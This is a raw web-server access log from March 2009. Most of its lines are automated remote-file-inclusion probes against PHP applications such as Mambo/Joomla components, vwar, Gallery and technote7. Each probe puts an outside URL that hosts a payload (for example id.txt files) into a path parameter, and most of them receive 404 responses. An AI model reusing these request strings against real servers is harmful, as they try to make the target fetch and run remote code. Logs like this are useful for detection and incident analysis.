218.38.55.195 - - [22/Mar/2009:16:11:22 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:11:23 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:11:23 -0500] "GET /logs/access_log.1235952000/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:11:23 -0500] "GET /logs/access_log.1235779200/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:09 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:09 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:14 -0500] "GET /logs/access_log.1235952000/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:14 -0500] "GET /logs/access_log.1235779200/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:16 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:16 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:16 -0500] "GET /logs/access_log.1235952000/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:12:16 -0500] "GET /logs/access_log.1235779200/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:16:14:30 -0500] "GET /logs/access_log.1236124800/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.115.223.7 - - [22/Mar/2009:16:15:09 -0500] "GET //Gallery/displayCategory.php?basepath=http://www.ydcommunity.com/board/skin/vote/test.txt?%0D? HTTP/1.1" 404 311 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
211.115.223.7 - - [22/Mar/2009:16:15:09 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://www.ydcommunity.com/board/skin/vote/test.txt?%0D? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
218.38.55.195 - - [22/Mar/2009:16:15:15 -0500] "GET /logs/access_log.1236124800/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.236.47.71 - - [22/Mar/2009:16:15:16 -0500] "GET //Gallery/displayCategory.php?basepath=http://www.ydcommunity.com/board/skin/vote/test.txt?%0D? HTTP/1.1" 404 311 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
222.236.47.71 - - [22/Mar/2009:16:15:16 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://www.ydcommunity.com/board/skin/vote/test.txt?%0D? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
218.38.55.195 - - [22/Mar/2009:16:15:16 -0500] "GET /logs/access_log.1236124800/modules/Neos_Chronos/header.php?base_folder=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
80.68.61.100 - - [22/Mar/2009:16:17:24 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
80.68.61.100 - - [22/Mar/2009:16:17:26 -0500] "GET //config/dbutil.bck.php?confdir=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
208.76.222.178 - - [22/Mar/2009:16:20:46 -0500] "GET /logs/access_log.1235692800/e404.php?DOCUMENT_ROOT=http://www.annuaire-philatelie.com/les_news/backend/idfx1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.208.133 - - [22/Mar/2009:16:25:21 -0500] "GET /logs/access_log.1132531200 HTTP/1.1" 200 937 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.133 - - [22/Mar/2009:16:25:25 -0500] "GET /logs/access_log.1162425600 HTTP/1.1" 200 984 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
97.117.224.18 - - [22/Mar/2009:16:27:53 -0500] "GET /logs//errors.php?error=http://lostpsychic.com/langs/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
97.117.224.18 - - [22/Mar/2009:16:27:57 -0500] "GET //errors.php?error=http://lostpsychic.com/langs/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.246.99.99 - - [22/Mar/2009:16:30:31 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:16:30:31 -0500] "GET /logs/access_log.1227657600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:16:30:31 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.246.99.99 - - [22/Mar/2009:16:30:52 -0500] "GET /logs/access_log.1233792000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
112.76.46.5 - - [22/Mar/2009:16:34:02 -0500] "GET //Gallery/displayCategory.php?basepath=http://itroit.com/zip/test.txt??? HTTP/1.1" 404 311 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
112.76.46.5 - - [22/Mar/2009:16:34:09 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://itroit.com/zip/test.txt??? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
65.55.230.165 - - [22/Mar/2009:16:36:07 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [22/Mar/2009:16:36:07 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
69.57.170.33 - - [22/Mar/2009:16:36:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.814"
69.57.170.33 - - [22/Mar/2009:16:36:40 -0500] "GET //skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.814"
69.57.170.33 - - [22/Mar/2009:16:36:41 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.814"
69.57.170.33 - - [22/Mar/2009:16:36:41 -0500] "GET //skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.814"
206.51.230.20 - - [22/Mar/2009:16:38:45 -0500] "GET /logs/access_log.1233360000 HTTP/1.1" 200 92841 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
12.53.219.68 - - [22/Mar/2009:16:42:49 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
12.53.219.68 - - [22/Mar/2009:16:42:49 -0500] "GET //skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
12.53.219.68 - - [22/Mar/2009:16:43:36 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
12.53.219.68 - - [22/Mar/2009:16:43:36 -0500] "GET //skin/zero_vote/error.php?dir=http://help4dogs.ru/den/idont.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
121.78.88.237 - - [22/Mar/2009:16:48:26 -0500] "GET /logs/?INCLUDE_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.79"
121.78.88.237 - - [22/Mar/2009:16:48:26 -0500] "GET /?INCLUDE_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
200.234.200.134 - - [22/Mar/2009:16:58:00 -0500] "GET /logs/images/errors.php?error=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.234.200.134 - - [22/Mar/2009:16:58:00 -0500] "GET /images/errors.php?error=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.111.184.103 - - [22/Mar/2009:17:00:29 -0500] "GET /logs/?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.805"
89.111.184.103 - - [22/Mar/2009:17:00:30 -0500] "GET /?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
77.221.130.6 - - [22/Mar/2009:17:01:10 -0500] "GET /logs/?INCLUDE_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.805"
77.221.130.6 - - [22/Mar/2009:17:01:10 -0500] "GET /?INCLUDE_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
66.103.128.44 - - [22/Mar/2009:17:03:27 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.103.128.44 - - [22/Mar/2009:17:03:27 -0500] "GET /logs/access_log.1227657600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.103.128.44 - - [22/Mar/2009:17:03:27 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.103.128.44 - - [22/Mar/2009:17:03:44 -0500] "GET /logs/access_log.1233792000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
200.234.200.134 - - [22/Mar/2009:17:07:46 -0500] "GET /logs/images/errors.php?error=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.234.200.134 - - [22/Mar/2009:17:07:47 -0500] "GET /images/errors.php?error=http://tkysms.org/.cache/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
66.232.145.150 - - [22/Mar/2009:17:09:59 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:17:09:59 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:17:09:59 -0500] "GET /logs/access_log.1227657600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
80.68.61.100 - - [22/Mar/2009:17:10:29 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
66.232.145.150 - - [22/Mar/2009:17:10:31 -0500] "GET /logs/access_log.1233792000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
80.68.61.100 - - [22/Mar/2009:17:10:32 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
66.232.145.150 - - [22/Mar/2009:17:13:14 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:17:13:14 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:17:13:14 -0500] "GET /logs/access_log.1227657600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.232.145.150 - - [22/Mar/2009:17:13:28 -0500] "GET /logs/access_log.1233792000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:17:15:24 -0500] "GET /logs/?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.805"
77.221.130.6 - - [22/Mar/2009:17:15:25 -0500] "GET /?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
222.236.47.71 - - [22/Mar/2009:17:18:21 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.ydcommunity.com/board/skin/vote/test.txt?%0D? HTTP/1.1" 404 297 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
222.236.47.71 - - [22/Mar/2009:17:18:21 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.ydcommunity.com/board/skin/vote/test.txt?%0D? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
218.27.203.107 - - [22/Mar/2009:17:31:33 -0500] "GET /errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:17:31:33 -0500] "GET /logs/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:17:31:33 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.51.230.20 - - [22/Mar/2009:17:33:02 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 200 167874 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
211.43.205.222 - - [22/Mar/2009:17:34:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.43.205.222 - - [22/Mar/2009:17:34:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.43.205.222 - - [22/Mar/2009:17:34:29 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.43.205.222 - - [22/Mar/2009:17:35:38 -0500] "GET /logs/access_log.1235692800//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.146.231.207 - - [22/Mar/2009:17:44:41 -0500] "GET /logs/?ROOT_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.65"
218.146.231.207 - - [22/Mar/2009:17:44:42 -0500] "GET /?ROOT_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
218.27.203.107 - - [22/Mar/2009:17:46:57 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:17:46:57 -0500] "GET /logs/access_log.1235692800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:17:46:58 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:17:47:05 -0500] "GET /logs/access_log.1235174400//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:47:44 -0500] "GET /logs//errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:47:44 -0500] "GET /logs/access_log.1233619200//errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:47:44 -0500] "GET //errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:48:39 -0500] "GET /logs/access_log.1235692800//errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.6 - - [22/Mar/2009:17:49:17 -0500] "GET /logs/?ADMIN_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.805"
77.221.130.6 - - [22/Mar/2009:17:49:17 -0500] "GET /?ADMIN_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
84.40.23.30 - - [22/Mar/2009:17:51:13 -0500] "GET //?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
84.40.23.30 - - [22/Mar/2009:17:51:15 -0500] "GET /logs//?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 200 182577 "-""libwww-perl/5.79"
121.78.88.237 - - [22/Mar/2009:17:52:07 -0500] "GET //errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:17:52:07 -0500] "GET /logs/access_log.1233619200//errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:17:52:07 -0500] "GET /logs//errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.57.170.33 - - [22/Mar/2009:17:52:40 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://help4dogs.ru/den/id1v4.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.57.170.33 - - [22/Mar/2009:17:52:46 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://help4dogs.ru/den/id1v4.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.57.170.33 - - [22/Mar/2009:17:52:47 -0500] "GET /logs/access_log.1235952000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://help4dogs.ru/den/id1v4.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:17:53:25 -0500] "GET /logs/access_log.1235692800//errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.57.170.33 - - [22/Mar/2009:17:53:38 -0500] "GET /logs/access_log.1235779200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://help4dogs.ru/den/id1v4.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:55:25 -0500] "GET /logs/access_log.1233619200/?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:55:25 -0500] "GET /?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:55:27 -0500] "GET /logs/?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 182572 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:17:56:37 -0500] "GET /logs/access_log.1235692800/?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:17:57:03 -0500] "GET /logs/access_log.1233619200/?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:17:57:03 -0500] "GET /?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:17:57:05 -0500] "GET /logs/?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 200 182572 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:17:59:03 -0500] "GET /logs/access_log.1235692800/?ADMIN_FOLDER=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.27.197.119 - - [22/Mar/2009:18:02:17 -0500] "GET /logs/appserv/main.php?appserv_root=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
72.27.197.119 - - [22/Mar/2009:18:02:17 -0500] "GET /appserv/main.php?appserv_root=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
218.27.203.107 - - [22/Mar/2009:18:03:27 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:03:27 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:03:27 -0500] "GET /logs/access_log.1235692800//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:03:36 -0500] "GET /logs/access_log.1235174400//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.111.184.103 - - [22/Mar/2009:18:05:52 -0500] "GET /logs/?ADMIN_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.805"
89.111.184.103 - - [22/Mar/2009:18:05:52 -0500] "GET /?ADMIN_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
218.27.203.107 - - [22/Mar/2009:18:08:14 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:08:14 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:08:14 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:08:28 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:08:31 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:08:31 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:08:32 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
218.27.203.107 - - [22/Mar/2009:18:08:47 -0500] "GET /logs/access_log.1232064000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
121.78.88.237 - - [22/Mar/2009:18:09:28 -0500] "GET /logs/?ROOT_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 182572 "-""libwww-perl/5.79"
121.78.88.237 - - [22/Mar/2009:18:09:29 -0500] "GET /?ROOT_FOLDER=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
72.232.182.162 - - [22/Mar/2009:18:09:31 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.232.182.162 - - [22/Mar/2009:18:09:31 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.232.182.162 - - [22/Mar/2009:18:09:31 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
208.113.160.16 - - [22/Mar/2009:18:09:54 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
208.113.160.16 - - [22/Mar/2009:18:09:54 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
